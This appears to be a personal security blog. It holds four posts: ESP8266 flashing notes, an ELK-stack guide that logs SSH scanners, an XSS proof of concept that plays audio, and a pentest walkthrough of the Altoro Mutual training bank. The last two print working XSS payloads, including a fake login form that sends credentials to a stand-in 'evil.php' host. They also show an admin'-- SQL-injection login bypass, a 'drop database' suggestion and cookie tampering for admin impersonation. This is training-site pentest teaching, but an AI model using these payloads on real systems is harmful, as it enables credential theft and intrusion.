Wednesday, March 2, 2016

IOT-ing with ESP8266

Update on May 26, 2016...yet another surprise from this board. After flashing and for programming the board I observed TX on USB converter has to be connected to TX on ESP board, same with RX pin. Yes you typically see you have to pair TX with RX and viceversa but not with this board.

I always find myself seeing that nothing will work the first time I try... and playing with ESP8266 modules was not going to be the exception. This post will therefore cover the eventual right steps I took towards making these modules work as I haven't seen any other blog out there covering these specifically. As you can see it is an ESP8266-12 development board that comes with a battery holder. (Details of this device below in the last section).

The failures :(

Before purchasing the above module there were some failed attempts included ESP8266-1, ESP8266-3 and ESP8266-12. The "beauty" of these modules and I guess with hardware-ish projects is that the chance of failure is now increased by physical factors: bad soldering, overheating, wrong connections, faulty power source, manufacturing error ... yeah I think I have been bitten (and maybe learnt) from all those. I leave a picture here of two defunct modules, still they can serve as an example/reference of how they can be assembled. I overheated the ESP8266-12 but still I feel proud I was able to solder that many jumper wires somewhat nicely (they are male to male plugged to that small white breadboard).

The success :)

In this section I will detail the steps I took and config changes I made to start using the module, for a list of the tools I used/purchased have a look at the section below.
Note this module comes with a pre-installed somewhat shady (I would say) firmware that requires a mobile app to work. In some pages they direct you to an APK that requires an excessive number of permissions to run, I would be wary to install that APK on your phone. Therefore the first step I took was re-flashing, note I am using Linux for flashing and Windows for programming.

  • Connect the wiring and jumper as follows:
    • 1: Ground from the USB to serial converter to GPIO0 (zero) of the ESP module, yes this is required in addition to step 4.
    • 2: Make sure the USB to serial converter is set up to work on 3.3volts.
    • 3: Double check that RX on the USB to serial converter is connected to RX on the ESP module, and that TX on the converter is connected to TX on the ESP. (Yes not the typical way of pairing TX and RX pins).
    • 4: The jumper that comes with the ESP board should be plugged for flashing.
    • 5: sorry dummy number :)
    • 6: this will be used later, leave it disconnected for now.
    • *Instead of preferred normal AA batteries I used rechargeable batteries, I measured the output from the voltage regulator and it was providing the required 3.3 volts to the development board.
  • Obtain a fresh NodeMCU image to flash, I wanted this better than the AT commands based ones. I left the default basic modules proposed in the web site.
  • The exact image I flashed can be found here if you need. Disclaimer I don't work for any 3 letter agency.
  • After the layout is ready and the USB to serial converter is connected to your computer it is time to proceed to flashing.
  • The windows flashers tools didn't work for me so I used a Kali Linux VMware Player virtual machine to run the script, make sure you enable the USB to Serial converter on VMware. 
  • Not surprisingly esptool didn' work for me out of the box either, I was getting errors such as
warning: espcomm_send_command(FLASH_DOWNLOAD_DATA) failed
warning: espcomm_send_command: didn't receive command response 
  • However by modifying its source so that It would flash with smaller block sizes it worked. Check the code contains the following:
    ESP_RAM_BLOCK   = 0x1800
    ESP_FLASH_BLOCK = 0x4 
  • To do a preamble check that esptool works attempt to execute the read_mac command. To do so first restart the module (i typically do by separating a battery away from the coil in the battery holder and attaching it again) and execute the command highlighted below.
python read_mac
Connecting...MAC: 18:fe:34:zz:yy:xx
  • If esptool manages to return the configured mac of your ESP module it means it communicated well with the device and you are ready to go with the flashing command as follows:
python write_flash 0x00000 nodemcu-master-7-modules-2016-03-01-21-25-51-integer.bin
Erasing flash...
Took 2.10s to erase flash block
Wrote 397520 bytes at 0x00000000 in 574.7 seconds (5.5 kbit/s)...
  • It will take sometime (because of the source code changes we made) however it should work.
  • Now it is time to test it! Turn off the ESP module and detach the USB to serial converter from VMware so that it is visible by your windows native system (if you are using windows, if Linux/Mac you can do this by using minicom or other terminals).
  • With the ESP module turned off, make the following changes to the physical wiring/connections to the device:
    • Remove that jumper marked with number 4 in the picture above
    • Connect the pin marked as 6 to ground. In other words the wire that was previously connected to GPIO0 (zero) now should be connected where number 6 points.
    • Verify that TX from USB converter is connected to TX on ESP module, do the same with the RX connectors. Yes this is not the typical way to connect it, but once again this board got me with this.
  • Once all the arrangements are done power on the ESP module.
  • Verify in which COM port the USB to serial converter is connected to, go to the windows control panel/device manager (use the shortcut Windows Key + Pause to get faster to control panel) and observe the Ports (COM & LPT) section. 
  • Download the ESPlorer tool from here and run the bat file.
  • Once inside ESPlorer select the COM port, COM4 in my case, specify a 9600 baud speed and click on the "open" button. You should see something like the following and be able to write your first print("hello world") command.

  • Note: if you don't connect the ground wire the ESP8266 module will ignore any command you provide to it... yeah this was the last thing bothering me until I got it all working.
That's it, now you can go ahead and code whatever you need on it. Hopefully this guide was useful for you, next posts I will try to cover some cool stuff you can do with modules like these.

The gear I used for success

The gear I used and what/where I purchased:

  • ESP8266-12 development board with battery holder. Link

  • USB to serial converter (FTDI FT232RL USB to TTL Serial Converter Adapter Module 5V + 3.3V) Link

  • Female to female (lesbian?) jumper wire cables. Link

Monday, May 5, 2014

Elastic Security: Deploying Logstash, ElasticSearch, Kibana "securely" on the Internet

Hello folks!
Continuing with the tradition of at least one post per year I wanted to write about a pilot I built and keep on refining based on ElasticSearch (1.1.1), Logstash (1.4.0) and Kibana (3.0.1). I wanted to get my hands dirty with these as I have increasingly seen traditional SQL based security applications/tools failing when attempting to scale.

NoSQL databases and big data technologies are becoming a must if you want to properly take care of enterprise security in which you can get large quantities of log data per day. Being the three of them Open Source and well supported I decided to give them a try and put something together.

The pilot I will present here is a sort of "SSH scanners statistics" that will display several charts and a geo-location map based on the source IP address of systems scanning for open SSH ports on the Internet.

I have used only one ElasticSearch node as I am just collecting traffic hitting port 22/TCP(SSH) on a VPS running Ubuntu 13.10 on top of OpenVZ. This means/required that I have had to implement a bit of hardening so that it is bulletproof...well never say never ;). The steps I took to put all this together are as follows:
  1. Probably the first step would be enabling SSH on a non standard port so that your own SSH connections don't clutter the SSH logs. To do so simply edit your /etc/ssh/sshd_configand set the port parameter to a number other than 22. Be mindful your ssh connection will break when you do this and you'll have to reconnect. After acknowledging this execute service ssh restart to restart ssh on the specified port
  2. Enable iptables rules to log incoming traffic to the SSH port with this command on a root shell:
  3. iptables -A INPUT -p tcp -m tcp --dport 22 -j LOG --log-level 4 
  4. You may want to save this rule to make it persistent after reboots. To do so you can use the iptables-save and iptables-restore commands. A useful package is iptables-persistent, install it by running apt-get install iptables-persistent. It will generate a file on your file system on /etc/iptables/rules.v4 to which you can save your iptables changes and they will be restored after reboots:
  5. iptables-save>/etc/iptables/rules.v4
  6. Now, in order to store those logs generated by iptables into a specific file you need to edit you syslog server configuration file.  On your /etc/syslog.conf file add the line:
    kern.warning /var/log/iptables.log
    In order for that file not to grow without control create the following file /etc/logrotate.d/iptables.
  7. /var/log/iptables.log {
            rotate 7
  8. Check that the rule is working by attempting to connect to your box on port 22. A simple way to do this would be using telnet:
    telnet <server_ip> 22
    Your /var/log/iptables.log file should contain the corresponding logs resembling something like the below
    May  3 17:20:08 host kernel: [742317.869535] IN=venet0 OUT= MAC= SRC= DST=A.B.C.D LEN=60 TOS=0x00 PREC=0x00 TTL=62 ID=51695 DF PROTO=TCP SPT=36333 DPT=22 WINDOW=14600 RES=0x00 SYN URGP=0
  10. Let's now get the tools we need. I recommend grabbing the deb files from the elasticsearch official site as they include the init.d starting/stopping scripts. Note that these packages require Java run time machine so it will be worth installing openjdk-7-jdk openjdk-7-jre-headless. All the described activities are performed as follows
  11. apt-get install openjdk-7-jdk openjdk-7-jre-headless
    //example of grabbing the deb file for elasticsearch, note you will also need logstash deb file and Kibana (Kibana comes in a zipped or tar file)
    //the below command installs a deb file; you will need to do the same for the logstash deb file
    dpkg -i elasticsearch-1.1.1.deb
  12. In order to run, stop or restart logstash and elasticsearch once they are installed you can use the /etc/init.d/logstash [start|stop|restart|status] or the elasticsearch equivalent. Note that to have them starting autonomously after any system reboot you will need to enable them via update-rc command.
  13. update-rc.d elasticsearch defaults 95 10
    update-rc.d logstash defaults
  14. Note that if running your machine on top of an OpenVZ node the Elasticsearch start script could fail stating sysctl: permission denied on key 'vm.max_map_count' my quick and dirty solution for this was commenting out the offending lines on /etc/init.d/elasticsearch init script.
  15. #       if [ -n "$MAX_MAP_COUNT" ]; then
    #               sysctl -q -w vm.max_map_count=$MAX_MAP_COUNT
    #       fi
  16. Once the services are running. If you issue a netstat command you will notice elasticsearch listening to any incoming connection on two different ports.
  17. netstat -putan | grep LISTEN
    tcp        0      0*               LISTEN      5420/java
    tcp        0      0*               LISTEN      5420/java
  18. We obviously don't want this behaviour, so below we will make the following changes so that elasticsearch listens on the loopback interface a.k.a. localhost. On the file /etc/elasticsearch/elasticsearch.yml enable/uncomment the following line as follows
  20. Now after restarting the services, if we issue netstat again we will see how elasticsearch is listening on the loopback interface or
  21. netstat -putan | grep LISTEN
    tcp        0      0*               LISTEN      5420/java
    tcp        0      0*               LISTEN      5420/java
  22. Let's take care of the logstash piece before jumping into the presentation layer (Apache & Kibana). Logstash would be the agent feeding log information to elasticsearch. Let's see how we can tell logstash to store our iptables logs into elasticsearch. Create the file /etc/logstash/conf.d/geoiptables.conf.
  23. input {
    #this file contains the iptables logs as defined in our syslog.conf file.        
    file {
                    path => [ "/var/log/iptables.log" ]
                    type => "iptables"
    filter {
            if [type] == "iptables" {
                    grok {
    #See next bullet below for the contents of /usr/share/grok/patterns
                            match => { "message" => "%{IPTABLES}"}
                            patterns_dir => ["/usr/share/grok/patterns"]
            if [src_ip]  {
                    geoip {
                            source => "src_ip"
                            target => "geoip"
    #This should be shipped in the deb file we downloaded.
                            database => "/opt/logstash/vendor/geoip/GeoLiteCity.dat"
    #note that the below field additions and mutations are required for Kibana to properly plot the information.
                            add_field => [ "[geoip][coordinates]", "%{[geoip][longitude]}" ]
                            add_field => [ "[geoip][coordinates]", "%{[geoip][latitude]}"  ]
                    mutate {
                            convert => [ "[geoip][coordinates]", "float" ]
    output {
    #we leave this so that when we debug running logstash from the command line we can see the output that will be stored in elasticsearch
            stdout {
                    codec => rubydebug
    #again for security purposes our elasticserach installation only runs on localhost.
            elasticsearch {
                    protocol => "http"
                    host => ""
  24. Note that for my purposes I used the pre-built iptables regex snippet available on the address you will see below. However it did not work out of the box as my iptables logs don't contain the source MAC address, neither the inbound interface. Therefore, I created the file /usr/share/grok/patterns/iptables and modified it as follows (basically stating that those fields are optional with the "?" symbol.
  25. # Source :
    NETFILTERMAC %{COMMONMAC:dst_mac}:%{COMMONMAC:src_mac}:%{ETHTYPE:ethtype}
    ETHTYPE (?:(?:[A-Fa-f0-9]{2}):(?:[A-Fa-f0-9]{2}))
    IPTABLES1 (?:IN=%{WORD:in_device} OUT=(%{WORD:out_device})? MAC=(%{NETFILTERMAC})? SRC=%{IP:src_ip} DST=%{IP:dst_ip}.*(TTL=%{INT:ttl})?.*PROTO=%{WORD:proto}?.*SPT=%{INT:src_port}?.*DPT=%{INT:dst_port}?.*)
    IPTABLES2 (?:IN=%{WORD:in_device} OUT=(%{WORD:out_device})? MAC=(%{NETFILTERMAC})? SRC=%{IP:src_ip} DST=%{IP:dst_ip}.*(TTL=%{INT:ttl})?.*PROTO=%{INT:proto}?.*)
  26. Let's start logstash from the commend line to verify it is all working without errors. To do so you need to issue /opt/logstash/bin/logstash -f /etc/logstash/conf.d/geoiptables.conf. You should see an output like this:
  27. Using milestone 2 input plugin 'file'. This plugin should be stable, but if you see strange behaviour, please let us know! For more information on plugin milestones, see {:level=>:warn}
           "message" => "May  5 09:55:37 host kernel: [888446.478915] IN=venet0 OUT= MAC= SRC= DST= LEN=60 TOS=0x00 PREC=0x00 TTL=50 ID=29355 DF PROTO=TCP SPT=51955 DPT=22 WINDOW=14600 RES=0x00 SYN URGP=0 ",
          "@version" => "1",
        "@timestamp" => "2014-05-05T13:55:37.658Z",
              "type" => "iptables",
              "host" => "host",
              "path" => "/var/log/iptables.log",
         "in_device" => "venet0",
            "src_ip" => "",
            "dst_ip" => "",
             "proto" => "TCP",
          "src_port" => "51955",
          "dst_port" => "22",
             "geoip" => {
                        "ip" => "",
             "country_code2" => "GB",
             "country_code3" => "GBR",
              "country_name" => "United Kingdom",
            "continent_code" => "EU",
                  "latitude" => 50.5,
                 "longitude" => -0.14999999999999545,
                  "timezone" => "Europe/London",
                  "location" => [
                [0] -0.12999999999999545,
                [1] 51.5
               "coordinates" => [
                [0] -0.12999999999999545,
                [1] 51.5
  28. This means everything is working fine and the information is well parsed by logstash and stored in elasticsearch, now you should be ready to stop logstash command line with ctrl+c and start the daemon with /etc/init.d/logstash start. See the troubleshooting section below if you run into issues.
  29. If you haven't done yet install apache2 with apt-get install apache2 . Let's apply a bit of hardening to it by modifying the file /etc/apache2/conf-enabled/security.conf
  30. #Edit the file: /etc/apache2/conf-enabled/security.conf
    ServerTokens Prod
    ServerSignature Off
    TraceEnable Off
  31. We won't be exposing the Kibana front-end to everyone on the Internet, we will be enabling basic authentication and enabling SSL to mitigate attackers easily sniffing the credentials/session information. To take care of the basic auth piece we just need to generate the htpasswd file with:
  32. htpasswd -c /etc/htpasswd <username>
  33. For the SSL piece we will be self-generating a certificate (ideally you would buy one or generate one signed by your CA of choice and trusted by your browser).
  34. mkdir /etc/apache2/ssl
    openssl req -x509 -nodes -days 99999 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt
    //respond to the questions as requested
  35. We will need to enable several Apache modules as follows
  36. a2enmod ssl
    a2enmod proxy
    a2enmod proxy_http
    a2enmod auth_basic
    a2enmod rewrite
  37. Finally we should create an Apache site configuration to configure this all. Create it on /etc/apache2/sites-available/kibana.conf and enable it afterwards using the a2ensite
  38. #file /etc/apache2/sites-available/kibana.conf
    <ifmodule mod_ssl.c>
    <virtualhost *:443>
            SSLEngine on
            SSLCertificateFile      /etc/apache2/ssl/apache.crt
            SSLCertificateKeyFile /etc/apache2/ssl/apache.key
            ServerAdmin webmaster@localhost
            DocumentRoot /var/www
    #this allows end user -> reverse proxy -> query local listening elasticsearch
            ProxyPreserveHost On
            ProxyPass /kibana2/
            ProxyPassReverse /kibana2/
            <directory var="" www="">
                    AllowOverride None
                    AuthType basic
                    AuthName "private"
                    AuthUserFile /etc/htpasswd
                    Require valid-user
            ErrorLog ${APACHE_LOG_DIR}/error.log
            CustomLog ${APACHE_LOG_DIR}/access.log combined
  39. You also can think of either disabling port 80/tcp or creating a redirector to port 443/tcp as follows. Create the file /etc/apache2/sites-available/redirect2ssl.conf and later enable it with a2toensite.
  40.         <virtualhost>
            RewriteEngine on
            ReWriteCond %{SERVER_PORT} !^443$
            RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [NC,R,L]
            ErrorLog ${APACHE_LOG_DIR}/error.log
            CustomLog ${APACHE_LOG_DIR}/access.log combined
  41. Let's not forget about downloading Kibana and setting it up for our needs.
  42. //Kibana is a tar file, so untar it and move its contents to /var/www/kibana
    tar -xzvf kibana-3.0.1.tar.gz
    mkdir /var/www/kibana/ -p
    mv kibana-3.0.1 /var/www/kibana
    //allowing apache to serve it
    chown -R www-data: /var/www/kibana
    //now edit the file /var/www/kibana/config.js and make this changes (note the https:// and the kibana2) that will be handled by Apache proxy module
    elasticsearch: "https://"+window.location.hostname+"/kibana2",
  43. After Kibana has been set up let's connect to it by going to You should be prompted for the username and password we set up with the htpasswd command. And then you should see something like the following.
  44. Now you click on the link to load the default logstash interface where it says You can access it here. The default view will show with a nice time picker and your log lines below similarly to an expensive Splunk interface, but free in this case :D
  45. If you scroll down to the bottom you will see a button that says add a row, a row is the container in which we will incorporate our panels (the maps and charts) for the iptables log information. Go to the Rows tab, give the new row a Title and a Height, 650px could do, and then click on Create Row.
  46. Now at the bottom you should see the new row in which we will add the map panel. Click on the Add Panel green button and select Bettermap. Give it a Title, for instance SSH Scanners For the Coordinate Field write geoip.coordinates, as per the span (horizontally) selecting 9 should be fine, finally click on save.
  47. As per the charts it is also pretty straight forward. Similarly to how we added the map this time choose a terms panel, give it a Title such as Scanning Countries, for the Field select geoip.country_name, the style would be pie then click on Save.

That's all folks!


  • I have noticed logstash verbosity is not that good when there are errors parsing the log files. Some helpful tips would be:
  • Run logstash from command line (explained in this post) with the stdout output plugin enabled.
  • Check the logs on  /var/log/logstash.log
  • Your failed parsing logs would be still stored in elasticsearch but with a tag stating _grokparsefailure so when observing this don't think it is an error on elasticsearch side, revise logstash configuration file for glitches.
  • If you are using syslog-ng make sure you configure the user and group for  the files so that logstash can read them. Otherwise you will get a failed to open /var/log/iptables.log: Permission denied error on /var/log/logstash/logstash.log.
  • #file /etc/syslog-ng/syslog-ng.conf
    destination d_kern { file("/var/log/iptables.log" owner("logstash") group("adm") perm(0660)); };
  • Be careful if you modify your logstash configuration to respect when the configuration stanza requires using double quotes, brackets and square brackets.


Monday, July 15, 2013

Blind Site Scripting

Alexis and I were having a bright moment after siesta time and decided to put in practice a "brand new" attack... well probably somebody has already done this, but at least we haven't seen it out there before. As usual it had to be something fun and probably silly to keep us motivated.

Ladies and gentlemen, please welcome "Blind Site Scripting" a.k.a. BSS! ... never before XSS would talk to victims!

Here is the PoC, needs Firefox and speakers on (Tested on Firefox 29.0 on May 3rd 2014):<h1>Blind Site Scripting!</h1><script>var audio = new Audio();audio.src ='';audio.loop=true;;</script>

The video showing Blind Site Scripting it in action:

 Feel free to edit the text following the "text" parameter above. Of course, you can embed sound files directly like in the example below:<h1>Blind Site Scripting!</h1><script>var audio = new Audio();audio.src =' Macarena.mp3';audio.loop=true;;</script>

So as you can see using text to speech or recorded files we can play them and use them as a payload in our XSS scenarios thanks to HTML5 features such as the Audio element.

Some additional notes/disclaimers:
  • Of course the you must first find a XSS vulnerable page. Here we are using IBM's Appscan vulnerable site.
  • You would also need a text to speech service, I know at some point will go down and it won't work.
  • Tested on Firefox. IE and Chrome would stop non obfuscated XSS like this. 
  • If It doesn't work I am sure you will make it work eventually... this is not rocket science :)

Sunday, December 12, 2010

A glance at Altoro Mutual

* Robots.txt file has not been found but error page reveals Microsoft Internet Information Services in Use. Robots file sometimes expose juicy information.

* Server headers provide quite a lot of information: underlying technologies, versions, and a suspicious second cookie named “amSessionId”.

* While performing the test I just gapped by chance in this Google reply that includes the X-XSS-Protection with a 0 value, this causes IE 8 to allow displaying XSS suspicious content. There is a bit of discussion regarding this protection mechanism as it is said to block some benign contents so this is why Google may include this header. The X-Content-Type-Options set to nosniff is another header related to IE8 that helps mitigating certain attacks related to MIME type abuses.
* Sometimes you can get interesting information from contents metadata; in this case for example we see that the images have been edited with Photoshop 3.0. In other occasions one can get usernames and similar stuff to be used in the engagement.
* The main search function is vulnerable to XSS
Here is the cookie, the ASP.NET cookie has not been revealed because of the httponly flag that was set that avoids JavaScript usage of the cookie.
A more elaborated attack can be performed as follows. First inject the following string that will display a fake login page to trick the user (victim).;)%3Ch1%3E%3Cdiv%20background-color%3A%23FF3300%3E%3Cform+action%3D%E2%80%9Dhttp%3A%2F%2F127.0.0.1%2Fevil.php%E2%80%9D%3EUsername%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Duser%E2%80%9D%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Dpass%E2%80%9D%3E%3Cbr%3E%3Cinput+type=SUBMIT%20value=%22login%22%20/%3E%3C/form%3E%3C/div%3E
We set up a listening socket, with netcat in this example.
The user will then input his user and password.
And the attacker therefore captures them.
If we wanted to provide more impressive results we can start Beef exploitation framework in order to control a victim’s browser.
* The way of the application to locate contents seems vulnerable to path traversal. The application seems to like to server html files but when manipulating the parameter an unfiltered error is displayed with interesting information.
Insecure redirection or remote file inclusion was also tested with no luck
Here the attack (insecure redirection) seems possible here:
Abusing the URL like this
* But a warning message appears, which is vulnerable to injection, and we can perform the redirection.;<script>document.location="";</script>
* In the subscription feature they check client side what characters the user is introducing, but no server side leading to an error.
* Therefore by introducing a “’” we have a nice Database error that could derive into a SQL Injection attack.
It seems to be an underlying insert clause but does not respond as expected to Boolean clauses
We could try to perform additional SQL commands by appending a “;drop database” but It wouldn’t be fair for Altoro. Again there is a XSS here.
* Again we have another Cross Site Scripting in a message:
* They do not mark the field with the autocomplete=off tag, here is not so dangerous but it is in login forms.
* Directory indexing misconfiguration has been located with sensitive information:
* There is a local reference to a file that also reveals a user name:
* In the feedback form there is also another XSS.
* Incomplete web page coding so that the page lacks of functionality, can impact the public image of the Bank. The button does not work as the html form does not have even an action tag definition.
* Login information is transmitted in clear text:
* It reveals when a username is not in the system, it can lead to ease brute forcing attacks on username field.
We see admin works so we just have to concentrate on password
* It seems vulnerable to SQL Injection attack
It is very easy to circumvent login page according to the previous behavior exposed by the web page, we just have to use the following:
· User: “admin’--“ (exclude the double quotes).
· Password: whatever as its going to be ignored because of the “—“ symbols that are meant to comment lines in SQL.
We see we have logged in with admin account:
* By the way an easy password guessing shows us that we can log in with admin/admin credentials.
We see that admin login is in fact an administration menu of the application in which we could change other user’s password and thus log in as them as well.
Changing user password does not seem to work (to avoid abuses from pentesters I guess) but usernames are valuables to access by the “—“ technique.
* There is another directory indexing vulnerability
* There is a web service (not authenticated).
It contains the web service methods definition and the soap messages needed:
This can be attacked to obtain usernames by means of soap messages and possibly performing XML injection attacks
A captcha exists as well to avoid malicious users do brute forcing on the password field with automated tools:
* In the capcha window source code we see a password in an html comment:
With this info and the capcha number we can successfully login
* A possible XML/XPATH injection exists:
With this we would obtain the first item
By crafting a more complex syntax we would for example find recursively the rest items. The contents are anyway indexed and available:
* Header injection vulnerability exists that allows modifying the page returned by the server.
* Regarding to session management we show below admin and sjoe cookies to detect possible vulnerabilities:
- admin cookie
Cookie: ASP.NET_SessionId=35f2wi55vpoyoyrg0ve54szg; amSessionId=446643804; amUserInfo=UserName=YWRtaW4=&Password=YWRtaW4=; amUserId=1
- sjoe cookie
Cookie: ASP.NET_SessionId=hvejm345qencll55npbtsqe0; amSessionId=582146246; amUserInfo=UserName=c2pvZSctLQ==&Password=bmFkYQ==; amUserId=100116013; amCreditOffer=CardType=Platinum&Limit=12000&Interest=5.4
We can highlight the following weaknesses:
· Username and password information is resent on every query, this only should happen when login in and the server session context must maintain this information.
· A suspicious amUserId is just used to difference one user from another, see image below.
· Special offers are set on client side by mans of amCreditOffer,CardType and Limit.
· The seemingly hashed information contained in username or password is just a base64 encoding so it is easy to intercept and reverse. (c2pvZSctLQ== is translated to sjoe'--)
* Having logged in as sjoe user we just have to ask for a privileged page like and modify sjoe amUserId field to set it to admin’s one (1) and we can access that critical page impersonating admin user.